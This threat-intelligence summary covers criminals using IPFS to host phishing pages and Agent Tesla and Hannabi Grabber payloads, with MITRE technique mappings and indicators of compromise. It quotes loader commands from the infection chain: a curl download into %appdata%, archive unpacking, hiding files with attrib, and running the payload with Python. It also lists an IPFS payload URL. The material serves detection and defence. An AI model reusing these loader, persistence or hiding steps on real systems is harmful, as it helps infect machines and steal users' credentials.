Threat Research

Threat Spotlight: Cyber Criminal Adoption of IPFS for Phishing, Malware Campaigns

Securonix

IPFS is being exploited by threat actors to host phishing pages and malware payloads, leveraging its censorship-resistant hosting to resist takedowns. Cisco Talos observes multiple campaigns using IPFS to host and retrieve malicious content, complicating defense. #IPFS #AgentTesla #HannabiGrabber #DocuSign #SWIFT

Keypoints

  • IPFS is used to host phishing kits and malware payloads, taking advantage of its resilience and moderation challenges.
  • Cisco Talos tracks ongoing campaigns that leverage IPFS to serve phishing pages and malicious content.
  • IPFS gateways allow access via standard HTTP/HTTPS, complicating network defense compared with malicious domains.
  • Agent Tesla malspam campaigns retrieve final payloads from IPFS during the infection chain.
  • Hannabi Grabber is a Python-based information stealer that uses Discord Webhooks for C2 and exfiltration and targets passwords, cookies, and Discord/Roblox data.
  • The campaigns demonstrate a multi-stage infection chain, including loaders, Python-based payloads, reverse shells, and destructive payloads.
  • Organizations should educate themselves about Web3 technologies like IPFS and implement controls to detect or block IPFS-based threats.

MITRE Techniques

  • [T1566.002] Phishing: Spearphishing Link – The campaign uses emails purporting to be from a legitimate service to lure victims to IPFS-hosted pages. ‘The victim received a PDF that purports to be associated with the DocuSign document-signing service.’
  • [T1105] Ingress Tool Transfer – The downloader retrieves a payload from an IPFS gateway. ‘The downloader reaches out to an IPFS gateway to retrieve a blob of data that has been hosted within the IPFS network.’
  • [T1059.003] Windows Command Shell – The loader uses cmd.exe to run commands, including downloading Python embed ZIP. ‘C:Windowssystem32cmd.exe /c curl https://www.python.org/ftp/python/3.10.4/python-3.10.4-embed-amd64.zip -o %appdata%MicrosoftNetworkpython-3.10.4-embed-amd64.zip’
  • [T1059.001] PowerShell – The loader expands archives using PowerShell to unpack the downloaded Python package. ‘powershell Expand-Archive python-3.10.4-embed-amd64.zip -DestinationPath %appdata%MicrosoftNetwork’
  • [T1547.001] Registry Run Keys/Startup Folder – Persistence by adding registry Run entries. ‘HKLMSoftwareMicrosoftWindowsNTCurrentVersionWinlogon’ and ‘HKLMSoftwareMicrosoftWindowsCurrentVersionRun’
  • [T1564.001] Hide Artifacts – The loader hides artifacts by setting System and Hidden attributes. ‘attrib +S +H %appdata%MicrosoftNetwork’
  • [T1059.006] Python – The final payload is executed as Python, indicating Python as a loader/interpreter. ‘…python.exe Packages.txt’
  • [T1059.006] Python (Loader/Payload) – The loader invokes Python to execute the final payload, demonstrating the use of Python-based components in the chain. ‘The loader invokes the newly downloaded Python executable and passes the final payload as a command line argument…’
  • [T1490] Inhibit System Recovery – Destructive payloads attempt to delete system recovery options. ‘Deleting volume shadow copies on the system.’
  • [T1485] Data Destruction – Destructive payloads delete user directories and mounted filesystems. ‘Deleting directory contents stored within C:Users…’
  • [T1555.003] Credentials from Web Browsers – Hannabi Grabber collects password and cookies from Chrome. ‘collects password and cookie data from Chrome.’
  • [T1071.001] Web Protocols – C2 channel uses Discord Webhooks for command and control and exfiltration. ‘uses Discord Webhooks for C2 and data exfiltration.’
  • [T1041] Exfiltration Over C2 Channel – Data is transmitted to attacker-controlled Discord servers. ‘transmits that data to an attacker-controlled Discord server.’

Indicators of Compromise

  • [Domain] IPFS gateway domains – ipfs.io, infura-ipfs.io
  • [URL] IPFS resource URL used to host/retrieve content – https://ipfs.io/ipfs/bafybeiaysi4s6lnjev27ln5icwmtueaw2vdykrtjkwiphwekaywqhcjze
  • [File Name] Loader artifacts – Packages.txt, Script.bat
  • [File Name] Payload archives – python-3.10.4-embed-amd64.zip
  • [Malware Family] Agent Tesla – information stealer family
  • [Malware Family] Hannabi Grabber – Python-based information stealer

Read more: https://blog.talosintelligence.com/ipfs-abuse/